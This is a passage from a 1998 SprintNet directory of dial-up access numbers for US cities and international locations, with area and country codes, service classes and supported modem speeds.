FL 850 Valparaiso 897-3421 B FL 561 West Palm Beac 820-9391 B GA 912 Albany 431-3113 C GA 706 Athens 548-9698 B GA 404 Atlanta 688-1212 A GA 706 Augusta 722-9877 B GA 706 Columbus 322-9386 B GA 770 Gainsville 532-9880 B GA 912 Macon 741-2108 C GA 706 Rome 234-1428 B GA 912 Savannah 236-2898 B HI 808 Oahu 536-3886 (1) IA 515 Ames 233-2603 C IA 319 Burlington 752-2516 B IA 319 Cedar Rapids 298-4600 B IA 319 Davenport 322-3361 C IA 319 Debuque 556-0783 C IA 515 Des Moines 288-4626 B IA 319 Iowa City 339-0320 C IA 712 Sioux City 255-1545 C IA 319 Waterloo 232-0195 B ID 208 Boise 343-0957 B ID 208 Idaho Falls 529-0406 B ID 208 Lewiston 743-5885 C ID 208 Pocatello 232-1764 B IL 847 Arlington Heig 670-9522 B IL 630 Aurora 896-9802 B IL 618 Belleville 277-9551 B IL 309 Bloomington 828-1441 B IL 312 Chicago 938-5462 A IL 815 De Kalb 756-3455 B IL 217 Decatur 429-6054 C IL 847 Glencoe 835-1143 B IL 815 Joliet 722-9652 C IL 708 Lansing 474-9310 B IL 847 Libertyville 362-5718 B IL 630 Naperville 355-2910 B IL 309 Peoria 674-2344 B IL 815 Rockford 962-9523 B IL 217 Springfield 525-1590 B IL 217 Urbana 384-3322 B IN 812 Bloomington 331-8890 C IN 812 Evansville 422-2911 B IN 219 Ft Wayne 422-8013 B IN 219 Gary 881-1020 B IN 317 Indianapolis 299-2593 B IN 765 Kokomo 452-0073 C IN 765 Lafayette 742-5488 C IN 765 Muncie 288-1113 C IN 765 Richmond 935-7532 B IN 219 South Bend 288-2355 B IN 812 Terre Haute 235-5671 C KS 785 Lawrence 843-8124 B KS 913 Leavenworth 651-0015 B KS 785 Manhattan 537-0948 B KS 785 Salina 825-7900 B KS 785 Topeka 232-5507 B KS 316 Wichita 264-4211 B KY 502 Bowling Green 843-0632 B KY 502 Frankfort 875-2911 B KY 606 Lexington 231-7717 B KY 502 Louisville 583-1209 B KY 502 Owensboro 686-8107 B LA 318 Alexandria 445-1053 B LA 225 Baton Rouge 344-5105 A LA 318 Lafayette 233-6951 B LA 318 Lake Charles 436-0518 C LA 318 Monroe 345-0106 B LA 504 New Orleans 524-7442 A LA 318 Shreveport 424-2255 B MA 508 Attleboro 226-8956 B MA 617 Boston 338-0002 A MA 508 Brockton 583-3533 B MA 781 Dedham 326-4064 B MA 508 Fall River 677-4477 B MA 508 Framingham 620-1119 B MA 978 Lawrence 687-8252 B MA 781 Lexington 862-9124 B MA 978 Lowell 459-2350 B MA 508 New Bedford 990-3300 B MA 413 Northhampton 586-0510 C MA 413 Pittsfield 499-7741 B MA 978 Salem 744-1559 B MA 413 Springfield 747-3700 B MA 508 Woods Hole 540-4085 C MA 508 Worcester 791-7630 B MD 410 Annapolis 266-6851 B MD 410 Baltimore 244-0470 A MD 301 Frederick 293-9596 B MD 301 Gaithersburg 869-4191 A ME 207 August 622-7364 B ME 207 Brewer 973-0700 C ME 207 Lewiston 784-0105 C ME 207 Portland 791-2400 C MI 734 Ann Arbor 741-8488 A MI 616 Battle Creek 961-9927 B MI 616 Bridgman 465-3248 B MI 313 Detroit 965-3011 A MI 810 Flint 767-3590 B MI 616 Grand Rapids 774-5958 B MI 517 Jackson 782-8111 C MI 616 Kalamazoo 381-3101 B MI 517 Lansing 482-0120 B MI 906 Marquette 228-4622 B MI 517 Midland 832-7068 B MI 616 Muskegon 726-5723 C MI 248 Pontiac 858-7109 B MI 810 Port Huron 982-8364 B MI 517 Saginaw 797-3822 B MI 248 Southfield 827-4710 B MI 616 Traverse City 946-2121 B MI 810 Warren 573-7300 B MI 734 Wayne 326-4210 B MN 218 Duluth 722-3029 B MN 507 Mankato 388-3780 B MN 612 Minneapolis 332-0033 A MN 507 Rochester 282-0555 C MN 320 St Cloud 253-1264 C MO 573 Columbia 499-0580 B MO 573 Jefferson City 634-8436 C MO 816 Kansas City 421-5783 A MO 417 Springfield 831-0057 B MO 314 St. Charles 723-5179 B MO 816 St Joseph 279-4797 C MO 314 St Louis 421-1376 A MS 228 Gulfport 863-0024 B MS 601 Hattiesburg 264-0815 B MS 601 Jackson 354-5303 B MS 601 Meridian 482-2210 B MS 601 Port Gibson 437-8916 B MS 601 Starkville 324-2155 B MT 406 Billings 248-6373 C MT 406 Great Falls 771-0067 B MT 406 Helena 443-0527 B MT 406 Missoula 543-5575 C NC 828 Asheville 259-9945 B NC 336 Burlington 229-0032 B NC 704 Charlotte 332-4023 A NC 910 Fayetteville 323-5940 C NC 704 Gastonia 865-4708 B NC 336 Greensboro 299-6600 B NC 828 Hickory 326-9860 B NC 336 High Point 889-7494 B NC 336 N.Wilkesboro 838-1663 C NC 919 Raleigh 781-9976 B NC 919 Res Tri Park 549-0542 B NC 252 Tarboro 823-7459 C NC 910 Wilmington 763-8292 C NC 336 Winston-Salem 785-9962 B ND 701 Grand Forks 775-7813 B ND 701 Fargo 235-9069 C ND 701 Mandan 663-6339 C NE 308 Grand Island 381-2049 B NE 402 Lincoln 438-4305 B NE 402 Omaha 341-4622 B NH 603 Concord 225-2566 B NH 603 Durham 868-2924 B NH 603 Manchester 647-2750 B NH 603 Nashua 880-0118 C NH 603 Portsmouth 431-7984 B NJ 609 Atlantic City 348-3233 B NJ 732 Freehold 780-2680 B NJ 201 Hackensack 488-1726 B NJ 609 Marlton 988-7800 B NJ 609 Merchantville 663-7730 B NJ 973 Morristown 605-1836 B NJ 732 New Brunswick 220-0405 B NJ 973 Newark 624-8843 A NJ 973 Passaic 777-2700 B NJ 973 Paterson 279-4515 B NJ 609 Princeton 799-2266 A NJ 732 Rahway 388-5288 B NJ 732 Redbank 571-0003 B NJ 973 Roseland 227-6722 B NJ 732 Sayreville 525-9507 B NJ 973 Summit 701-0767 B NJ 609 Trenton 392-4100 B NJ 609 Vineland 696-3883 B NM 505 Albuquerque 246-8950 B NM 505 Las Cruces 529-9191 B NM 505 Santa Fe 473-3403 C NV 702 Las Vegas 737-1752 B NV 702 Reno 824-3000 B NY 518 Albany 433-0092 B NY 607 Binghamton 773-2244 B NY 716 Buffalo 847-8181 B NY 516 Deer Park 254-6021 B NY 516 Hempstead 292-2820 B NY 607 Ithaca 273-2200 C NY 212 New York City 206-0256 A NY 716 Niagara Falls 282-3284 B NY 518 Plattsburgh 562-1890 C NY 914 Poughkeepsie 471-6728 B NY 716 Rochester 546-6998 B NY 315 Syracuse 448-0021 B NY 315 Utica 792-9962 B NY 914 White Plains 949-6878 B OH 330 Canton 455-1700 B OH 513 Cincinnati 579-1593 A OH 216 Cleveland 575-0811 A OH 614 Columbus 461-8671 A OH 937 Dayton 461-4600 B OH 440 Elyria 322-8645 C OH 419 Findley 422-8188 B OH 513 Hamilton 863-4116 B OH 330 Kent 678-8330 A OH 440 Lorain 960-1771 C OH 419 Mansfield 589-0276 C OH 419 Sandusky 627-0050 B OH 937 Springfield 324-1520 B OH 419 Toledo 255-7010 B OH 330 Warren 856-7265 C OH 330 Wooster 345-1023 B OH 330 Youngstown 743-2983 B OK 918 Bartlesville 336-6362 B OK 580 Lawton 353-0225 B OK 405 Oklahoma City 270-0028 B OK 405 Stillwater 743-1447 B OK 918 Tulsa 584-6935 B OR 541 Corvallis 754-0559 C OR 541 Eugene 683-5147 B OR 541 Hood River 386-4405 C OR 541 Klamath Falls 882-6282 B OR 541 Medford 772-3994 B OR 503 Portland 295-0337 A OR 503 Salem 375-3104 B PA 814 Altoona 949-0310 B PA 724 Butler 285-8721 B PA 717 Carlisle 249-9311 C PA 717 Danville 271-3840 C PA 814 Erie 459-9779 B PA 724 Greenburg 836-4771 B PA 717 Harrisburg 221-1500 B PA 814 Johnstown 535-3356 B PA 610 King of Prussi 265-2812 B PA 717 Lancaster 295-7128 C PA 215 Levittown 946-3469 B PA 412 Monroeville 380-5100 B PA 215 Philadelphia 854-0589 A PA 412 Pittsburgh 281-8326 A PA 610 Reading 607-8500 B PA 717 Scranton 341-5611 B PA 814 State College 231-1510 C PA 215 Warrington 491-6800 B PA 610 West Chester 436-7406 B PA 610 Whitehall 770-2244 C PA 717 Williamsport 494-5500 C PA 717 Wilkes-Barre 820-9755 B PA 717 York 845-9717 B RI 401 Newport 849-0229 B RI 401 North Kingston 295-7100 B RI 401 Providence 453-5353 B RI 401 Woonsocket 765-0019 B SC 843 Charleston 723-7342 B SC 803 Columbia 254-0038 B SC 843 Florence 669-0042 B SC 864 Greenville 232-7832 B SC 843 Myrtle Beach 626-9134 B SC 864 Spartanburg 542-1653 B SD 605 Pierre 224-2257 B SD 605 Rapid City 348-2048 B SD 605 Sioux Falls 334-4953 B TN 423 Bristol 968-2480 C TN 423 Chattanooga 266-3066 B TN 931 Clarksville 552-0032 B TN 423 Johnson City 282-6645 C TN 423 Knoxville 523-4031 B TN 901 Memphis 525-5201 B TN 615 Nashville 726-1213 B TN 423 Oak Ridge 481-3590 B TX 915 Abilene 672-3902 B TX 806 Amarillo 373-2926 B TX 903 Athens 677-1712 C TX 512 Austin 929-0078 B TX 956 Brownsville 544-7073 C TX 409 Bryan 779-0713 C TX 512 Corpus Christi 888-7207 B TX 214 Dallas 653-0840 A TX 940 Denton 381-1897 C TX 915 El Paso 532-1912 B TX 817 Ft Worth 332-1015 A TX 409 Galveston 762-8076 B TX 713 Houston 228-0705 A TX 956 Laredo 724-1791 C TX 903 Longview 758-1161 C TX 806 Lubbock 765-9631 B TX 956 McAllen 631-8967 B TX 915 Midland 561-8931 B TX 409 Nederland 722-7162 B TX 915 San Angelo 944-0376 B TX 210 San Antonio 225-1191 B TX 903 Sherman 893-4995 B TX 254 Temple 773-9723 C TX 903 Texarkana 794-4700 B TX 903 Tyler 597-8925 C TX 512 Victoria 572-3197 B TX 254 Waco 752-2681 C TX 940 Wichita Falls 322-3774 B UT 435 Logan 752-3421 B UT 801 Ogden 627-1640 C UT 801 Provo 371-0278 B UT 801 Salt Lake City 355-9030 B VA 540 Blacksburg 552-9181 B VA 804 Charlottesvill 977-5330 C VA 540 Covington 962-2217 B VA 540 Fredericksburg 371-0188 B VA 540 Harrisonburg 434-0374 C VA 703 Herndon 787-6719 B VA 804 Lynchburg 845-0010 C VA 757 Newport News 596-9232 B VA 757 Norfolk 626-3349 B VA 703 Occoquan 494-0836 B VA 804 Richmond 225-0021 B VA 540 Roanoke 857-4266 B VT 802 Burlington 660-4795 B VT 802 Montpelier 223-0758 B VT 802 Rutland 775-1676 C VT 802 White River 295-7631 C WA 253 Auburn 939-9982 B WA 360 Bellingham 733-2873 B WA 425 Everett 774-7466 C WA 360 Longview 577-3992 B WA 360 Olympia 705-0769 C WA 509 Pullman 332-0172 B WA 509 Richland 943-6117 B WA 206 Seattle 625-1386 A WA 509 Spokane 747-2069 B WA 253 Tacoma 383-9488 B WA 360 Vancouver 693-6914 B WA 509 Wenatchee 663-9482 B WA 509 Yakima 575-1060 B WI 608 Beloit 362-5287 B WI 715 Eau Claire 836-0097 C WI 920 Green Bay 432-0346 B WI 608 La Crosse 784-0560 B WI 608 Madison 257-8330 B WI 414 Milwaukee 271-2420 A WI 920 Neenah 731-1560 B WI 715 Wausau 848-6044 B WV 304 Charleston 346-0524 B WV 304 Clarksburg 622-6827 B WV 304 Huntington 523-2802 C WV 304 Morgantown 292-0492 C WV 304 Wheeling 233-7732 B WY 307 Casper 265-8807 C WY 307 Cheyenne 637-3958 B WY 307 Laramie 721-5878 B (1) International data rates apply. (2) Service is provided by GCI. Access is restricted to collect calls to U.S. hosts connected to the SprintNet global data network. If prepaid access is required, contact a Sprint representative. For sign-on information, call SprintNet Customer Service at 1-800/877-5045 or 404/649-4970. International data rates apply. ]B[ INTERNATIONAL ASYNCHRONOUS DIAL SERVICE Updated June 30, 1998 - for asynchronous applications - at 300, 1200, 2400, 9600 and 14400 bps - with optional local error protection in select locations - from locations around the globe Now overseas locations are being enhanced to include local SprintNet Access Centers. These new centers provide direct access to the SprintNet global data network using the same sign-on procedures you use in the United States. So, no matter where you are, you'll have the same high quality SprintNet service. Please see footnotes for specific exceptions. The Customer Service number for users calling outside of the United States is 703-318-7740. The United States Customer Service number is 800-827-4685 #1. International Service Requirements ---------------------------------- SPEED: MODEM TYPE: 300 bps V.21 compatible 1200 bps V.22 compatible 2400 bps V.22 bis compatible 9600 bps CCITT V.32 compatible 14400 bps V.32 bis compatible NOTE: o ALL COUNTRY CODES DO NOT NEED TO BE DIALED WHEN DIALING WITHIN COUNTRY o CITY CODES WITHIN PARENTHESES () DO NOT NEED TO BE DIALED WHEN DIALING WITHIN COUNTRY INTERNATIONAL ASYNCHRONOUS DIAL SERVICE --------------------------------------------------------------------- COUNTRY CITY DIAL COUNTRY CODE CODE NUMBER SPEED ----------------------------------------------------------------------- Australia+,*** 61 Adelaide+ 8 8232-5941 Up to 14400bps Brisbane+ 7 33-91-0719 Up to 14400bps Canberra+ 6 257-5055 Up to 14400bps Melbourne+ 3 9663-8622 Up to 14400bps Perth+ 8 9481-1122 Up to 14400bps Sydney+ 2 9281-0800 Up to 14400bps Austria 43 Vienna 1 504-2811 Up to 14400bps Belarus+^ 7 Minsk+ 0172 26-0812 Up to 2400bps Belgium 32 Antwerp 3++ 234-2700 Up to 14400bps Brussels 2 725-3400 Up to 14400bps Brazil 55 Belo Horizonte 31 2911900 Up to 14400bps Sao Paulo 11 5070-7999 Up to 14400bps Bulgaria 359 Burgas*+ 0133 Up to 9600bps Burgas+ 56 99626 Up to 9600bps Interpred*+ 0133 Up to 9600bps Interpred+ 2 7146-4444 Up to 14400bps Plovdiv+ 32 264-497 Up to 9600bps Russe*+ 0133 Up to 9600bps Sofia*+ 0133 Up to 14400bps Sofia+ 2 91-129 Up to 14400bps Stara Zagora*+ 0133 Up to 9600bps Veliko Tarnovo*+ 0133 Up to 9600bps Varna*+ 0133 Up to 9600bps Varna+ 52 601842 Up to 14400bps Vratza*+ 0133 Up to 9600bps Canada 1 Calgary+ 403 262-7887 Up to 14400bps Dartmouth**+ 902 492-0036 Up to 14400bps Halifax**+ 902 492-0036 Up to 14400bps Montreal**+ 514 392-0202 Up to 14400bps Ottawa+ 613 235-6481 Up to 14400bps Pointe Claire**+ 514 392-0202 Up to 14400bps Toronto+ 416 594-1121 Up to 14400bps Vancouver+ 604 684-4696 Up to 14400bps Chile Santiago 56 2 365-1110 Up to 14400bps Colombia 57 Bogota+ 1 623-5866 Up to 14400bps Czech Republic 420 Prague 2 7077-7777 Up to 19200bps Denmark+ 45 Copenhagen+ 35 439-111 Up to 9600bps Egypt 20 Cairo 2 3382400 Up to 14400bps Estonia+^ 372 Tallinn+> 3726 631-2286 Up to 2400bps Finland 358 Helsinki 9 146-3022 Up to 14400bps France~ 33 Lille 3 2065-3260 Up to 14400bps Lyon 4 7864-5095 Up to 14400bps Paris 1 4643-0505 Up to 14400bps Sofia Antipolis 4 9296-0049 Up to 14400bps Germany++ 49 Dusseldorf 211 323-8570 Up to 14400bps Frankfurt 69 666-9151 Up to 14400bps Hamburg 40 310-180 Up to 14400bps Munich+ 89 291-62800 Up to 14400bps Stuttgart 71 181-2001 Up to 14400bps Greece 30 Athens+ 1 957-8020 Up to 14400bps Guam 671 Tumon 649-3282 Up to 14400bps Hong Kong 852 Hong Kong 300-26442 Up to 14400bps Hungary 36 Budapest+ 1 3351023 Up to 14400bps Indonesia 62 Jakarta+ 21 386-1044 Up to 14400bps Ireland 353 Cork 21 319 699 Up to 14400bps Dublin 1 661 4466 Up to 14400bps Galway 91 561 177 Up to 14400bps Israel 972 Tel Aviv + Rosh Haayin 3 900-1234 Up to 14400bps Italy 39 Milan 2 76110219 Up to 14400bps Rome 6 23239400 Up to 14400bps Japan 81 Nagoya+ 52 586-7021 Up to 14400bps Niigata+ 25 246-4095 Up to 14400bps Osaka 6 534-8700 Up to 14400bps Tokyo 3 3794-6381 Up to 14400bps Fukuoka+ 92 623-1253 Up to 14400bps Hiroshima+ 82 227-9139 Up to 14400bps Sapporo+ 11 752-0620 Up to 14400bps Sendai+ 22 216-7326 Up to 14400bps Takamatsu+ 878++ 23-4866 Up to 14400bps Toyama+ 764 33-4807 Up to 14400bps Yokohama+ 45 451-0425 Up to 14400bps Jordan 962 Amman 6 700-701 Up to 14400bps Kazakhstan+^ 7 Akmola+ 3172 333618 Up to 9600bps Aktau+ 3292 514959 Up to 9600bps Aktyubinsk+ 3132 574641 Up to 14400bps Alma-Ata+ 3272 507000 Up to 14400bps Atyrau+ 31222 24647 Up to 9600bps Chimkent+ 3252 445221 Up to 9600bps Jambul+ 32622 47616 Up to 9600bps Jezkazgan+ 3102 769502 Up to 14400bps Karaganda+ 3212 431112 Up to 14400bps Kokshetau 31622 57000 Up to 14400bps Kulsary 31237 21818 Up to 9600bps Kustanai+ 3142 546926 Up to 14400bps Kyzyl-Orda 32422 70265 Up to 9600bps Pavlodar+ 3182 327707 Up to 14400bps Petropavlovsk+ 3152 469909 Up to 14400bps Semipalatinsk+ 3222 661303 Up to 9600bps Taldykurgan+ 32822 45221 Up to 14400bps Uralsk+ 31122 20684 Up to 9600bps Ust-Kamenogorsk+ 3232 645906 Up to 9600bps Korea (South) 82 Changwon+ 551 96-9944 Up to 14400bps Chuncheon+ 361 262-1496 Up to 14400bps Chungju+ 431 292-2101 Up to 2400bps Incheon+ 32 868-3395 Up to 14400bps Jeonju+ 652 75-1135 Up to 14400bps Jeju+ 64 55-7671 Up to 2400bps Kangreung+ 391 43-3671 Up to 2400bps Kwangju+ 62 226-3085 Up to 14400bps Kwangyang+ 667 791-2277 Up to 14400bps Pohang+ 562 75-3115 Up to 14400bps Pusan+ 51 441-8555 Up to 14400bps Seoul 2 551-4525 Up to 14400bps Suwon+ 331 254-4955 Up to 2400bps Taejun 42 533-7500 Up to 14400bps Teagu+ 53 475-0075 Up to 14400bps Ulsan+ 522 258-1818 Up to 14400bps Kuwait+ 965 Kuwait City+ 484-4155 Up to 9600bps Kyrgystan 7 Bishkek+ 3312 216706 Up to 9600bps Latvia+^ 7 Riga+ 013 722-3811 Up to 2400bps Lithuania+++ 370 Kaunas+ 7 206373 Up to 14400bps Klaipeda+ 6 310690 Up to 14400bps Vilnius+ 2 73-4133 Up to 14400bps Luxembourg 352 Strassen 31-6667 Up to 14400bps Malaysia 60 Kuala Lumpur+ 3 7329372 Up to 14400bps Penang+ 4 3971526 Up to 14400bps Mexico 52 Chihuahua 14 118-522 Up to 14400bps Coatzacoalcos 921 43-209 Up to 14400bps Culiacan 67 520-303 Up to 14400bps Guadalajara+ 3 678-1500 Up to 14400bps Hermosillo 62 106-033 Up to 14400bps Juarez+ 16 29-3200 Up to 14400bps Leon 47 710-225 Up to 14400bps Mazatlan 69 803-025 Up to 14400bps Mexico City+ 5 729-5200 Up to 14400bps Monterrey+ 83 99-0700 Up to 14400bps Puebla+ 22 29-1900 Up to 14400bps Reynosa 89 246-804 Up to 14400bps Tijuana+ 66 86-1372 Up to 14400bps Torreon 17 501-181 Up to 14400bps Tuxtla 961 273-07 Up to 14400bps Veracruz 29 319-161 Up to 14400bps Netherlands 31 Amsterdam*** 20 6533533 Up to 14400bps New Zealand+ 64 Auckland+ 9 379-0335 Up to 14400bps Wellington+ 4 499-3617 Up to 14400bps Norway 47 Oslo 22 595700 Up to 14400bps Peru 51 Lima+ 1 221-7747 Up to 14400bps Philippines 63 Manilla^^+ 2 760-1700 Up to 14400bps Portugal 351 Lisbon 1 315-2508 Up to 9600bps Porto 2 8302141 Up to 9600bps Puerto Rico 1 San Juan 787 273-7400 Up to 14400bps Russia+ 7 Abakan+ 39022 5-1210 Up to 9600bps Akademgorodok+ 3832 36-0470 Up to 2400bps Alexandrov 09244 22181 Up to 9600bps Angarsk^+ >>> 83951 562121 Up to 2400bps Aniva+ 42441 5-2757 Up to 2400bps Arkhangelsk^+ 8182 65-0608 Up to 2400bps Astrakhan+ 8512 391355 Up to 2400bps Bagan+ >> 253 9-1226 Up to 2400bps Barabinsk+ >> 2612 5006 Up to 2400bps Barnaul^+ 3852 26-1601 Up to 9600bps Belebei 34716 31594 Up to 9600bps Belgorod+ 0722 27-3201 Up to 9600bps Beloretzk+ 34792 5-0510 Up to 9600bps Berdsk+ >> 241 3-2012 Up to 2400bps Birobidjan+ 42622 4-0137 Up to 2400bps Birsk 34714 49744 Up to 9600bps Biysk^+ 3854 24-2410 Up to 2400bps Blagoveschensk 4162 426268 Up to 9600bps Bolotnoe 249 22303 Up to 9600bps Bratsk^+ < 3953 42-0620 Up to 2400bps Chany+ >> 267 2-1072 Up to 2400bps Cheboksary+ 8350 21-4656 Up to 2400bps Chelyabinsk+ 3512 66-4007 Up to 14400bps Cherepanovo+ 3832 2-4674 Up to 2400bps Cherepovets 8202 223444 Up to 2400bps Cherkessk+ 87822 5-0579 Up to 2400bps Chistoozernoe+ >> 268 9-1886 Up to 2400bps Chita^+ 3022 328276 Up to 2400bps Chulym+ >> 250 3-9512 Up to 2400bps Dovolnoe+ >> 254 21174 Up to 2400bps Durtuli 34717 21752 Up to 2400bps Eisk^+ 86132 4-6153 Up to 2400bps Ekaterinburg^+ 3432 49-5356 Up to 2400bps Elista 84772 60645 Up to 14400bps Gorno-Altaisk+ 38822 3-1099 Up to 2400bps Gorokhovec 09238 22822 Up to 2400bps Gus-Khrustalny 09241 27900 Up to 9600bps Irkutsk^+ 3952 25-5191 Up to 2400bps Ishim+ 251 2-1222 Up to 14400bps Iskitim+ >> 243 21246 Up to 2400bps Izhevsk+ 3412 51-0347 Up to 14400bps Kaliningrad+ 0112 349288 Up to 2400bps Kameshkovo 09248 23573 Up to 9600bps Kamensk-Shakhtinsky 86365 5-5045 Up to 2400bps Karasuk+ >> 255 5-1508 Up to 2400bps Kargat+ >> 265 22502 Up to 2400bps Kazan+ 8432 38-7344 Up to 9600bps Kemerovo+ 3842 52-8601 Up to 2400bps Khabarovsk^+ 4212 21-4937 Up to 2400bps Kholmsk 4243 60660 Up to 14400bps Kirov+ 8332 6-0660 Up to 14400bps Kirzhach 09237 23315 Up to 2400bps Kochenevo 2512 42000 Up to 9600bps Kochki+ >> 256 2-2864 Up to 2400bps Kolchugino 09245 93900 Up to 14400bps Kolivan 252 21703 Up to 2400bps Komsomolsk na Amure^+ 42172 47145 Up to 2400bps Kondopoga+ 82251 2-0379 Up to 2400bps Korsakov 42435 2-2222 Up to 2400bps Kovrov 09232 21242 Up to 9600bps Krasnodar^+ 8612 546614 Up to 2400bps Krasnoobsk 3832 480716 Up to 2400bps Krasnoozersk+ >> 257 4-1064 Up to 2400bps Krasnouralsk+ 34343 2-0803 Up to 2400bps Krasnoyarsk^+ 3912 66-1444 Up to 2400bps Kujbyshev+ >> 262 2-4196 Up to 2400bps Kupino+ >> 258 2-1448 Up to 2400bps Kurgan^+ 35222 7-1601 Up to 2400bps Kurilsk 42454 21280 Up to 2400bps Kursk+ 0712 56-5846 Up to 2400bps Kyshtovka+ >> 271 2-1583 Up to 2400bps Magnitogorsk+ 3511 37-6471 Up to 2400bps Maikop+ 87722 3-4652 Up to 2400bps Maslyanino+ >> 247 21371 Up to 2400bps Melenki 09247 22420 Up to 9600bps Meleuz^+ 34764 4-0008 Up to 9600bps Mesyagutovo 34798 21071 Up to 2400bps Moscow+ 095 928-0985 Up to 14400bps Moshkovo+ >> 248 2-1694 Up to 2400bps Murmansk+ 8152 286692 Up to 2400bps Murom 09234 32095 Up to 2400bps Nakhodka^+ 4236 642710 Up to 9600bps Nalchik+ 86622 7-3538 Up to 2400bps Narjan-Mar+ 81853 6-3721 Up to 2400bps Neftekamsk^+ 34713 5-7301 Up to 2400bps Nevelsk 42436 60155 Up to 2400bps Nizhnevartovsk+ 3466 24-1555 Up to 2400bps Niznij Novgorod^+ 8312 67-7710 Up to 2400bps Niznij Tagil+ 3435 25-2947 Up to 14400bps Norilsk+ 3919 46-1112 Up to 2400bps Novgorod+ 8162 131837 Up to 9600bps Novocherkassk+ 86352 4-3455 Up to 2400bps Novokuznetsk+ 3843 42-4081 Up to 2400bps Novorossijsk^+ 86134 5-2747 Up to 2400bps Novosibirsk^+ 3832 18-0060 Up to 2400bps Obj+ >> 273 21893 Up to 2400bps Okha+ 42437 2-2585 Up to 2400bps Oktyabrskij^+ 34767 4-3831 Up to 9600bps Omsk^+ 3812 23-7310 Up to 2400bps Ordynsk+ >> 259 21099 Up to 2400bps Orel+ 0862 771462 Up to 2400bps Orenburg+ 3532 565008 Up to 14400bps P.Kamchatsky^+ 4150 11-2505 Up to 2400bps Pechora+ 82142 30922 Up to 2400bps Penza+ 8412 55-3962 Up to 2400bps Perm^+ 3422 90-0320 Up to 14400bps Petrozavodsk^+ 8142 764160 Up to 2400bps Petushki 09243 23896 Up to 9600bps Pskov 8112 91773 Up to 9600bps Pyatigorsk+ 86533 4-1037 Up to 9600bps Rostov^+ 8632 65-7420 Up to 2400bps Rubtsovsk+ 38557 24774 Up to 2400bps Ryazan+ 0912 779172 Up to 9600bps Salavat^+ 34763 2-4322 Up to 9600bps Salsk+ 86372 3-1040 Up to 2400bps Samara^+ 8462 704031 Up to 2400bps Saratov^+ 8452 50-0499 Up to 14400bps Selivanovo 09236 21510 Up to 2400bps Serov+ 34315 2-0865 Up to 14400bps Severnoe 260 22235 Up to 2400bps Severodvinsk+ 81842 3-3322 Up to 2400bps Shakhty+ 86362 2-3055 Up to 2400bps Sibaj+ 34775 3-4250 Up to 2400bps Smolensk 8122 30616 Up to 9600bps Sobinka 09242 25150 Up to 2400bps Sochi^+ 8622 99-9550 Up to 14400bps Sortavala+ 81430 4-3388 Up to 2400bps South Kurilsk+ 42455 2-2145 Up to 2400bps South Sakhalinsk^+ 4242 72-7111 Up to 2400bps St Petersburg^+ 812 110-7792 Up to 9600bps Stavropol+ 8652 26-2790 Up to 2400bps Sterlitamak^+ 3473 25-5161 Up to 9600bps Sudogda 09235 21700 Up to 2400bps Surgut 3462 77-5400 Up to 9600bps Suzdal 09231 20289 Up to 2400bps Suzun+ >> 246 2-1818 Up to 2400bps Syktyvkar+ 8212 21-1979 Up to 2400bps Taganrog+ 86344 6-2328 Up to 2400bps Tatarsk+ >> 264 2-2924 Up to 2400bps Toguchin+ >> 240 2-2992 Up to 2400bps Toljatti^+ 8480 40-7196 Up to 2400bps Tomsk^+ 3822 521-100 Up to 2400bps Tuapse^+ 86167 3-0575 Up to 2400bps Tula 0872 331824 Up to 9600bps Tumen^+ 3452 25-1910 Up to 14400bps Tver^+ 0822 42-7411 Up to 2400bps Tymovsk+ 42447 2-1667 Up to 2400bps Ubinskoe+ >> 266 2-1466 Up to 2400bps Ufa^+ 3472 52-9410 Up to 2400bps Uglegorsk+ 42432 42-306 Up to 2400bps Ukhta+ 82147 45280 Up to 2400bps Ulan-Ude^+ 30122 12077 Up to 2400bps Uliyanovsk^+ 8422 410188 Up to 2400bps Uriev-Polsky 09246 02330 Up to 2400bps Usinsk+ 82144 49-563 Up to 2400bps Ussuriysk+ 42341 3-6111 Up to 2400bps Usolje-Sibirskoe^+ 39543 4-5110 Up to 2400bps Ust-Ilimsk^+ < 235 5-7365 Up to 2400bps Ustj-Tarka+ >> 272 2-2629 Up to 2400bps Vengerovo+ >> 269 2-1709 Up to 2400bps Vladimir 0922 233210 Up to 2400bps Vladivostok^+ 4232 22-3310 Up to 14400bps Volgodonsk+ 86392 2-7510 Up to 14400bps Volgograd^+ 8442 32-9965 Up to 9600bps Volzhsky+ 8443 421240 Up to 9600bps Voronezh^+ 0732 73-9815 Up to 2400bps Vyazniki 09233 23295 Up to 9600bps Yakutsk^+ 4112 241580 Up to 14400bps Zdvinsk+ >> 263 21224 Up to 2400bps Zemograd+ 86359 3-1961 Up to 9600bps Saipan 670 Garapan 2339005 Up to 14400bps Singapore 65 Singapore+ 738-0566 Up to 9600bps Spain 34 Barcelona~~ (9)3 261-3003 Up to 14400bps Madrid~~ (9)1 327-0565 Up to 14400bps Sweden+ 46 Gothenburg+ 31 720-4950 Up to 14400bps Malmo+ 40 600-4950 Up to 14400bps Stockholm+ 8 5625-1000 Up to 14400bps Switzerland++ 41 Bern 31 382-6300 Up to 9600bps Geneva 022 342-5607 Up to 9600pbs Zurich 1 302-8868 Up to 14400bps Taiwan 886 Chiayi+ 5 232-4430 Up to 2400bps 5 232-4523 Up to 9600bps Hsinchu+ 3 531-8946 Up to 2400bps 3 531-1596 Up to 9600bps Hualan+ 38 362-852 Up to 9600bps Kaoshiung+ 7 315-1365 Up to 2400bps 7 23-6001 Up to 9600bps Taichung+ 4 381-4064 Up to 2400bps 4 383-3973 Up to 96000bps Tainan+ 6 208-1680 Up to 2400bps 6 208-2002 Up to 9600bps Taipei 2 2739-1063 Up to 14400bps Taoyang+ 3 352-1781 Up to 2400bps 3 352-1633 Up to 9600bps Yanlin+ 4 836-4723 Up to 96000bps Turkey 90 Istanbul 212 2822464 Up to 14400bps Ukraine+ 7 Kiev+ 044 2465200 Up to 14400bps Odessa+ 0482 26-2801 Up to 9600bps United Kingdom 44 Basingstoke 0125 660-0061 Up to 14400bps Birmingham+ 0121 454-1110 Up to 9600bps Bristol+ 01179 298-519 Up to 14400bps Canterbury+ 01227 787-240 Up to 9600bps Doncaster+ 01302 325-755 Up to 9600bps Edinburgh, Scotland 0131 459-1290 Up to 14400bps Exeter+ 01392 490-288 Up to 14400bps Glasgow+ 0141 221-4033 Up to 14400bps London 0171 973-1030 Up to 14400bps 660-1234 Manchester 0161 794-1405 Up to 14400bps Milton Keynes+ 01908 200-361 Up to 14400bps Newcastle+ 0191 478-1889 Up to 9600bps Peterborough+ 01733 394-894 Up to 9600bps Uzbekistan+^ 7 Tashkent+ 3711 144-3910 Up to 9600bps Venezuela 58 Caracas+ 2 9563400 Up to 14400bps * This number can only be dialed from cities within this region. ** This 